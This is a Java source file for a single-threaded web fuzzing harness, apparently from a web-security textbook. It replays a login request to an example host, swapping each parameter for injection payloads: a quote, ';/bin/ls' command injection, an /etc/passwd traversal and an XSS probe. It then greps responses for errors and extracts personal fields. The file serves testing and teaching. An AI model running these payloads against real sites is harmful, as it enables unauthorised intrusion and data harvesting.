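// JAttack.java
// by Dafydd Stuttard
//
// Single-threaded request-replay harness: one parameter at a time is swapped
// for each value of a PayloadSource, the request is written as raw HTTP/1.0 to
// a plain socket, and one tab-separated summary line per request is printed.

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.Socket;
import java.net.UnknownHostException;
import java.nio.charset.StandardCharsets;

/** One request parameter: its baseline value, where it travels, and whether it is a target. */
final class Param {
    /** Where the parameter is placed in the request. */
    enum Type { URL, COOKIE, BODY }

    final String name;
    final String value;   // baseline value, sent whenever this parameter is not the one being replaced
    final Type type;
    final boolean attack; // false: always sent with its baseline value and never replaced

    Param(String name, String value, Type type, boolean attack) {
        this.name = name;
        this.value = value;
        this.type = type;
        this.attack = attack;
    }
}

/** A resettable sequence of payload strings, consumed with nextPayload()/getPayload(). */
interface PayloadSource {
    /** Advances to the next payload; returns false once the sequence is exhausted. */
    boolean nextPayload();

    /** Rewinds so that the next call to nextPayload() yields the first payload again. */
    void reset();

    /** Returns the current payload; only valid after nextPayload() returned true. */
    String getPayload();
}

/** Yields the integers from {@code from} to {@code to} inclusive, in increments of {@code step}. */
final class PSNumbers implements PayloadSource {
    final int from, to, step;
    int current;

    /**
     * @param step positive increment; a non-positive step would never exhaust the sequence
     *             and would hang the caller's loop
     * @throws IllegalArgumentException if {@code step <= 0}
     */
    PSNumbers(int from, int to, int step) {
        if (step <= 0) {
            throw new IllegalArgumentException("step must be positive, was " + step);
        }
        this.from = from;
        this.to = to;
        this.step = step;
        reset();
    }

    public boolean nextPayload() {
        current += step;
        return current <= to;
    }

    public void reset() {
        // one step before the first value, so the first nextPayload() lands on `from`
        current = from - step;
    }

    public String getPayload() {
        return Integer.toString(current);
    }
}

/** Yields a fixed list of strings, in array order. */
final class PSFuzzStrings implements PayloadSource {
    static final String[] fuzzStrings = new String[] {
        "'",
        ";/bin/ls",
        "../../../../../../etc/passwd",
        "xsstest"
    };

    int current = -1;

    public boolean nextPayload() {
        current++;
        return current < fuzzStrings.length;
    }

    public void reset() {
        current = -1;
    }

    public String getPayload() {
        return fuzzStrings[current];
    }
}

/** Drives the request loop: iterates parameters and payloads, sends, and summarises each response. */
final class JAttack {
    // attack config
    String host = "wahh-app.com";
    int port = 82;
    String method = "GET";
    String url = "/app/acc/login.jsp";
    Param[] params = new Param[] {
        new Param("ts", "29813", Param.Type.URL, true),
        new Param("_DARGS", "/app/acc/login_assumed.jsp", Param.Type.URL, true),
        new Param("webabacus_id", "131st22418177-1", Param.Type.COOKIE, true),
        new Param("DYN_USER_ID", "100014981", Param.Type.COOKIE, true),
        new Param("USER_CONFIRM", "836de5f76c5ec83", Param.Type.COOKIE, true),
        new Param("ParkoSearch2007", "true", Param.Type.COOKIE, true),
        new Param("JSESSIONID", "DKBHCAOQQWHFFCKTR", Param.Type.COOKIE, true),
        new Param("_dyncharset", "UTF-8", Param.Type.URL, true),
        new Param("_template", "app/inc/templ.jsp", Param.Type.URL, true),
        new Param("personalDetailsURL", "..%2Facc%2Fregister_p1.jsp", Param.Type.URL, true),
        new Param("login", "user@wahh-mail.com", Param.Type.URL, true),
        new Param("originalRedirectFromURL", "+", Param.Type.URL, true),
        new Param("password", "bestinfw", Param.Type.URL, true),
    };

    // PayloadSource payloads = new PSNumbers(3000, 3010, 1);
    PayloadSource payloads = new PSFuzzStrings();

    /** Substrings whose presence in a response is reported in the summary line. */
    static final String[] grepStrings = new String[] {
        "error", "exception", "illegal", "invalid", "not found", "xsstest"
    };

    /** Markers after which the text up to the next '<' is copied into the summary line. */
    static final String[] extractStrings = new String[] { "Name:", "Address:" };

    // attack state
    int currentParam = 0; // index into params of the parameter currently being replaced

    /**
     * Advances to the next (parameter, payload) pair.
     *
     * Parameters flagged attack=false are skipped; when a payload source is exhausted it is
     * reset and the next parameter is selected. Iterative rather than recursive so a long
     * run of skipped parameters cannot deepen the stack.
     *
     * @return false once every attackable parameter has seen every payload
     */
    boolean nextRequest() {
        while (currentParam < params.length) {
            if (!params[currentParam].attack) {
                currentParam++;
                continue;
            }
            if (payloads.nextPayload()) {
                return true;
            }
            payloads.reset();
            currentParam++;
        }
        return false;
    }

    /**
     * Builds the raw HTTP/1.0 request text for the current (parameter, payload) pair.
     *
     * Values are inserted verbatim — no URL or cookie encoding is applied — so the
     * payload reaches the server exactly as written in the PayloadSource.
     *
     * @return the complete request, headers and (optional) body, CRLF-terminated
     */
    String buildRequest() {
        // build parameters
        StringBuilder urlParams = new StringBuilder();
        StringBuilder cookieParams = new StringBuilder();
        StringBuilder bodyParams = new StringBuilder();
        for (int i = 0; i < params.length; i++) {
            Param p = params[i];
            String value = (i == currentParam) ? payloads.getPayload() : p.value;
            switch (p.type) {
                case URL:
                    urlParams.append(p.name).append('=').append(value).append('&');
                    break;
                case COOKIE:
                    cookieParams.append(p.name).append('=').append(value).append("; ");
                    break;
                case BODY:
                    bodyParams.append(p.name).append('=').append(value).append('&');
                    break;
            }
        }

        // build request
        StringBuilder req = new StringBuilder();
        req.append(method).append(' ').append(url);
        if (urlParams.length() > 0) {
            // drop the trailing '&'
            req.append('?').append(urlParams, 0, urlParams.length() - 1);
        }
        req.append(" HTTP/1.0\r\nHost: ").append(host);
        if (cookieParams.length() > 0) {
            // the trailing "; " is sent as-is
            req.append("\r\nCookie: ").append(cookieParams);
        }
        if (bodyParams.length() > 0) {
            String body = bodyParams.substring(0, bodyParams.length() - 1); // drop the trailing '&'
            req.append("\r\nContent-Type: application/x-www-form-urlencoded");
            // issueRequest() encodes as ISO-8859-1 (one byte per char), so the char count is the byte count
            req.append("\r\nContent-Length: ").append(body.length());
            req.append("\r\n\r\n").append(body);
        } else {
            req.append("\r\n\r\n");
        }
        return req.toString();
    }

    /**
     * Sends {@code req} to host:port and returns the whole response with line terminators removed.
     *
     * The connection is read until the peer closes it (HTTP/1.0 without keep-alive), and the
     * socket is closed on every path, including when connect or read fails. ISO-8859-1 is used
     * in both directions so the request's Content-Length and the response's length column are
     * byte-exact rather than dependent on the platform charset.
     *
     * @param req complete raw request text, as produced by buildRequest()
     * @return all response lines concatenated without separators (headers and body alike)
     * @throws UnknownHostException if {@code host} cannot be resolved
     * @throws IOException on any connect, write or read failure
     */
    String issueRequest(String req) throws UnknownHostException, IOException {
        try (Socket socket = new Socket(host, port)) {
            OutputStream os = socket.getOutputStream();
            os.write(req.getBytes(StandardCharsets.ISO_8859_1));
            os.flush();
            BufferedReader br = new BufferedReader(
                    new InputStreamReader(socket.getInputStream(), StandardCharsets.ISO_8859_1));
            StringBuilder response = new StringBuilder();
            String line;
            while ((line = br.readLine()) != null) {
                response.append(line); // terminators are dropped, so the reported length excludes them
            }
            return response.toString();
        }
    }

    /**
     * Summarises a response as tab-separated fields: status code, length, each grepString
     * that occurs, and for each extractString the text following it up to the next '<'.
     *
     * @param response the text returned by issueRequest(); may be empty, in which case the
     *                 status field is blank instead of the call failing
     * @return the summary, every field followed by a tab
     */
    String parseResponse(String response) {
        StringBuilder output = new StringBuilder();
        // status code is the second whitespace-separated token of "HTTP/1.x NNN Reason"
        String[] statusLine = response.split("\\s+", 3);
        output.append(statusLine.length > 1 ? statusLine[1] : "").append('\t');
        output.append(response.length()).append('\t');
        for (String grep : grepStrings) {
            if (response.contains(grep)) {
                output.append(grep).append('\t');
            }
        }
        for (String extract : extractStrings) {
            int from = response.indexOf(extract);
            if (from == -1) {
                continue;
            }
            from += extract.length();
            int to = response.indexOf('<', from);
            if (to == -1) {
                to = response.length();
            }
            output.append(response, from, to).append('\t');
        }
        return output.toString();
    }

    /** Runs every (parameter, payload) pair in turn and prints one summary row per request. */
    void doAttack() {
        System.out.println("param\tpayload\tstatus\tlength");
        while (nextRequest()) {
            String output;
            try {
                output = parseResponse(issueRequest(buildRequest()));
            } catch (Exception e) {
                // per-request boundary: a failed request is reported on its own row and the run continues
                output = e.toString();
            }
            System.out.println(params[currentParam].name + "\t" + payloads.getPayload() + "\t" + output);
        }
    }

    public static void main(String[] args) {
        new JAttack().doAttack();
    }
}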